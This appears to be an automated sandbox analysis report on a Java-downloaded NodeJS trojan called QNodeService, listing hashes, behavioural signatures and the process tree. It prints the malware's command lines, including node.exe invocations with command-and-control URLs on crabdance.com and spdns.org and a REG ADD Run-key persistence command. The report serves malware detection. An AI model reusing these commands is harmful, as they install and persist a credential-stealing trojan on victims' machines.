Analysis
-
max time kernel
146s -
max time network
148s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
06-07-2020 14:48
Static task
static1
Behavioral task
behavioral1
Sample
TJ001RFQ.jar
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
TJ001RFQ.jar
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
TJ001RFQ.jar
-
Size
12KB
-
MD5
4c91d1c7e9cdbdeaa6248393734aa803
-
SHA1
f8303592154cf38ed075635d7d6526f057fffeae
-
SHA256
e25096805f8a15d1c28e32f129af8a495a5a94cbef59c0ee7eacccf3e1578bf7
-
SHA512
1e767c97f624adcee9d28a64e42b00490b3742237a1c28fa43133c904508a427f5ef6be4d8a4c8e2dacfe957585f94689be8483d63261ecb5f78a7b9aaae46b1
Score
10/10
Malware Config
Signatures
-
QNodeService NodeJS Trojan 1 IoCs
resource yara_rule behavioral2/files/0x000100000001bfb1-114.dat family_qnodeservice -
Adds Run entry to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run\qnodejs-f2578a0e = "cmd /D /C \"C:\\Users\\Admin\\qnodejs-node-v13.13.0-win-x64\\qnodejs\\qnodejs-f2578a0e.cmd\"" reg.exe Key created \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe -
QNodeService
is a trojan written in NodeJS and spread via Java downloader. Utilizes stealer functionality.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 12 wtfismyip.com 11 wtfismyip.com -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1808 wrote to memory of 3680 1808 java.exe 69 PID 1808 wrote to memory of 3680 1808 java.exe 69 PID 3680 wrote to memory of 4004 3680 node.exe 70 PID 3680 wrote to memory of 4004 3680 node.exe 70 PID 4004 wrote to memory of 1008 4004 cmd.exe 71 PID 4004 wrote to memory of 1008 4004 cmd.exe 71 PID 3680 wrote to memory of 2180 3680 node.exe 72 PID 3680 wrote to memory of 2180 3680 node.exe 72 -
Executes dropped EXE 2 IoCs
pid Process 3680 node.exe 2180 node.exe -
Loads dropped DLL 4 IoCs
pid Process 2180 node.exe 2180 node.exe 2180 node.exe 2180 node.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2180 node.exe 2180 node.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\TJ001RFQ.jar1⤵
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js start --group user:[email protected] --register-startup --central-base-url https://zahernabalsi.crabdance.com --central-base-url https://zahernabelsi.spdns.org2⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:3680 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-f2578a0e" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-f2578a0e.cmd\"""3⤵
- Suspicious use of WriteProcessMemory
PID:4004 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-f2578a0e" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-f2578a0e.cmd\""4⤵
- Adds Run entry to start application
PID:1008
-
-
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js serve start --group user:[email protected] --register-startup --central-base-url https://zahernabalsi.crabdance.com --central-base-url https://zahernabelsi.spdns.org3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Checks processor information in registry
PID:2180
-
-